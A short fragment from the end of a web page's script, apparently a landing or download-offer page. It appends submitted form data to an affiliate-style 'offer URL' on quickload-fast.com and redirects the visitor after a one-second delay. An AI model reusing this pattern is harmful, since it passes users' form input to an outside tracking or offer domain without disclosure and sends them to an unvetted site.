        // offer URL
        var url = 'https://quickload-fast.com/?a=1001508&c=337055&co=258420&mt=16&s3=1464476670834630' + formData;
        
        console.log(url);

        setTimeout(function () {
            window.location.href = url;
        }, 1000);
    });
</script>


</body></html>